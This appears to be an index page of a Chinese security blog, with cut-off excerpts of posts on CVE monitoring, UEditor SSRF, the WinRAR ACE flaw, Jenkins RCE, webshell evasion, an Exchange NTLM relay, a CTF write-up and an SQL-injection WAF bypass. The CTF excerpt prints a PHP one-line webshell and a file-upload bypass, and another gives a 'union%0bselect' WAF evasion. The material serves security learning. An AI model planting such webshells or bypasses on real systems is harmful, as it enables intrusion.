0x01 前言
前几天在先知上看到伪全栈式安全研发:CVE监控这篇文章,就想着也实现一下代码进行最新CVE的监控。语言采用了Python,数据库也为Mongodb数据库。代码和实现的什么不重要,重要的是过程。
主要包括以下几个方面。
获取最新的CVE列表和详情
主要采用了python的requests模块和BeautifulSoup模块。
将最新的CVE信息存入数据库
数据库使用了Mongodb,采用了pymongo模块。
通过邮件发送最新的CVE信息
...
UEditor SSRF漏洞(JSP版本)分析与复现
前些时间测试的时候遇到了一个系统采用了UEditor编辑器,版本为1.4.3。已知该编辑器v1.4.3版本(jsp)存在SSRF漏洞,虽然是Bool型的SSRF,除了可以进行内网探测外,也可以根据web应用指纹信息,之后进行进一步的测试。
0x01 前言
查看官方的更新日志可以发现UEditor编辑器在版本1.4.3.1修复了SSRF漏洞。
那版本1.4.3应该存在SSRF漏洞,本着能搜索就不动手的原则搜了一下,发现wooyun-2015-0133125中提到过这...
WinRAR漏洞复现过程
0x01 漏洞描述
近日Check Point团队爆出了一个关于WinRAR存在19年的漏洞,用它来可以获得受害者计算机的控制。攻击者只需利用此漏洞构造恶意的压缩文件,当受害者使用WinRAR解压该恶意文件时便会触发漏洞。
该漏洞是由于 WinRAR 所使用的一个陈旧的动态链接库UNACEV2.dll所造成的,该动态链接库在 2006 年被编译,没有任何的基础保护机制(ASLR, DEP 等)。动态链接库的作用是处理 ACE 格式文件。而WinRAR解...
Hacking Jenkins Part 2 – Abusing Meta Programming for Unauthenticated RCE!
English Version
中文版本
嗨! 大家今天過得好嗎?
這篇文章是 Hacking Jenkins 系列的下集! 給那些還沒看過上篇文章的同學,可以訪問下面鏈結,補充一些基本知識及了解之前如何從 Jenkins 中的動態路由機制到串出各種不同的攻擊鏈!
Hacking Jenkins Part 1 - Play with Dynamic Routing
如上篇文章所說,為了最大程度發揮漏洞的效果,想尋找一個代碼執行的漏洞可以與 ACL 繞過漏洞搭配,成為一個不用認...
一句话木马的套路
0×01 前言
尽最大努力在一文中让大家掌握一些有用的 WEBSHELL 免杀技巧。
0×02 关于 eval 于 assert
关于 eval 函数在 php 给出的官方说明是
eval 是一个语言构造器而不是一个函数,不能被 可变函数 调用
可变函数:通过一个变量,获取其对应的变量值,然后通过给该值增加一个括号 (),让系统认为该值是一个函数,从而当做函数来执行
通俗的说比如你 <?php $a=eval;$a() ?> 这样是不行的 也造就了用 ...
Microsoft Exchange漏洞记录(撸向域控) – CVE-2018-8581
前一段时间exchange出现了CVE-2018-8581,搭了许久的环境,不过不得不敬佩这个漏洞整体超赞。
一开始主要还是利用盗取exchange的管理员权限去调用一些接口,导致可以做到,比如收取别人邮件,替别人发送邮件。
今天出了一个更加深入的利用分析
主要是利用了ews推送的ssrf,进行ntlm relay,从http -> ldap的利用。主要还是exchange权限太高了,可以改变用户的acl权限,再通过DCSync dump数据。
利用程...
密码保护:思路决定成败:F12给了我黑色的眼睛我却用它来挖洞
*文章原创作者:evil7,本文属于FreeBuf原创奖励计划,未经许可禁止转载
大家好,我又来混稿费了。
为了在脱贫致富关键的2020年前,正确地贯彻落实互惠双赢政策和以先富带后富的重要指示精神。
坐山吃山指哪儿打哪儿,今天就来说说F12除了挂自慰黑页,如何帮助你完成手工审计吧。(小和尚Maniac&最近在问相关问题,所以文中一道写来提供基础学习,文章篇幅将着重解释)
“打开这个页面的时候,我就知道...
安恒杯2018年10月月赛WriteUp
Web
手速要快
打开给了个登录框要密码。密码在消息头里就给出了。
登陆后要上传文件:
上传个一句话木马上去:
$ cat 1.jpg
<?php @eval($_POST['h']);?>
在bp里改成1.php.jpg后上传成功:
可以看到已经getshell:
flag在上一级目录里:
easy audit
打开给了一串随机数,并告诉有一些有趣的方法在flag.php里。F12查看源码提示了index.php?func1:
...
skysql之union绕waf
前记
以前校赛的时候出了一道skysql
灵感来自于bendawang师傅的一篇博客(像巨佬致敬orz)
今天正好有空写了一下题解
题目解法
题目过滤比较严格
盲注和报错注入都不太容易实现
但是不难发现
单个fuzz的话
union和select都没有被过滤
但是联合一起的话,union select是被过滤的
所以我可以猜想他的waf正则写法是:
1
|union select|
所以我们可以尝试绕过
1
union%0bselect
此时发现...
阿里云OSS约等于文件上传漏洞?
首先声明这是一篇标题党的文章,阿里云OSS不被这个锅,锅其实还是在企业或者说是用户。
前言
之所以要写这篇口水文,是因为最近在检测自家公司产品时发现存在这个问题,同时不久在测试某src的某系统时也存在类似这种问题,所以个人认为还是要提高一些警惕,让开发或测试者尽量消除不必要的麻烦,不要错误的认为文件托管在oss就可以忽略站内的上传功能存在的安全隐患。
概述
首先借用阿里云oss首页的介绍性...